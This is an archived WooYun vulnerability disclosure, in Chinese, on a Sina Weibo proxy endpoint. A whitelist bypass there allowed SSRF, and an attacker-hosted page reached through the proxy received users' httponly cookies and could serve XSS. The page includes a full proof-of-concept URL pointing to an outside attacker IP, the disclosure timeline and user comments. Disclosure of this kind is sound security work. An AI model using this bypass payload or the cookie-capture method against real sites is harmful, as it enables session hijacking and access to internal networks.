破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

微博上你点我的链接我就可xss你并可拿到httponly的cookie及其他危害

编号160643
Urlhttp://www.wooyun.org/bug.php?action=view&id=160643
漏洞状态厂商已经确认
漏洞标题微博上你点我的链接我就可xss你并可拿到httponly的cookie及其他危害
漏洞类型设计缺陷/逻辑错误
厂商新浪微博
白帽子呆子不开口
提交日期2015-12-12 08:56:00
公开日期2016-01-25 18:01:00
修复时间(not set)
确认时间2015-12-14 00:00:00
Confirm Spend2
漏洞标签设计缺陷/边界绕过 敏感接口缺乏校验 逻辑错误
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank10
漏洞简介
微博上你点我的链接,我就可xss你,并可拿到httponly的cookie,以及些其他方面的危害
漏洞细节

见如下请求,实现了一个代理访问url的功能
http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn
这个请求做了些url白名单的校验
但有如下问题:
一、存在绕过漏洞,导致ssrf漏洞,可以访问内网
这个代理功能存在url绕过漏洞,api参数使用下面格式的值可以绕过
http://[email protected]/wb.php
攻击poc见:http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn%40123.57.73.3%2Fwb.php
服务端程序会去请求http://123.57.73.3/wb.php
这样就可以ssrf访问内网了
二、xss
如果我们代理访问的是我们控制的页面,我们的页面可以输出一个存储xss了
三、httponly cookie
程序在代理访问我们的页面时,会把当前用户的cookie也带给我们。我的服务端php程序,通过$_SERVER['HTTP_COOKIE']就可以取到

POC

QQ20151210-0.png

修复方案

做好白名单校验

状态信息 2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开
厂商回复感谢关注新浪安全,安全问题修复中。
回应信息危害等级:高漏洞Rank:10 确认时间:2015-12-14 13:03
Showing 1-25 of 25 items.
评论内容评论人点赞数评论时间

居然会带上cookie去访问。。。这个有点意思

齐迹02016-01-08 20:52:00

我还以为是bug了 原来是个新洞~偶像好厉害!

佳佳佳佳佳02015-12-15 15:52:00

@呆子不开口 好吧,等着公开了,膜拜大神。

bit402015-12-14 08:55:00

@盛大在线 是我太菜逼...

bit402015-12-14 08:54:00

@盛大在线 呦

小思02015-12-12 22:37:00

@bit4 你太小看人家了

盛大在线02015-12-12 22:23:00

@bit4 不是

呆子不开口02015-12-12 22:08:00

妈妈问我为什么跪在电脑前。。。

神话般的孩纸02015-12-12 18:34:00

http://drops.wooyun.org/papers/501

bit402015-12-12 18:11:00

牛逼,膜拜

5t4rk02015-12-12 16:19:00

吃惊

金馆长02015-12-12 13:46:00

伟哥高考语文是省状元吧

从容02015-12-12 13:06:00

伟哥又要发威了!

k0_pwn02015-12-12 12:29:00

我的老表终于出场了

Submit02015-12-12 12:16:00

又扶了扶眼镜。

随风的风02015-12-12 11:22:00

表哥来了

onpu02015-12-12 11:12:00

蠕一把!

齐迹02015-12-12 11:09:00

6666

火风暴02015-12-12 10:33:00

@大师兄啥时候带我飞

imp0rt02015-12-12 09:55:00

陆由乙02015-12-12 09:55:00

@大师兄啥时候带我飞

八戒02015-12-12 09:54:00

危害等级:中漏洞Rank:8确认时间:2015-11-25 16:46

1937nick02015-12-12 09:20:00

我就是不点 看你怎么X我

mramydnei02015-12-12 09:15:00

@king7 你表哥真多、、

大师兄02015-12-12 09:11:00

我表哥又来了

king702015-12-12 09:00:00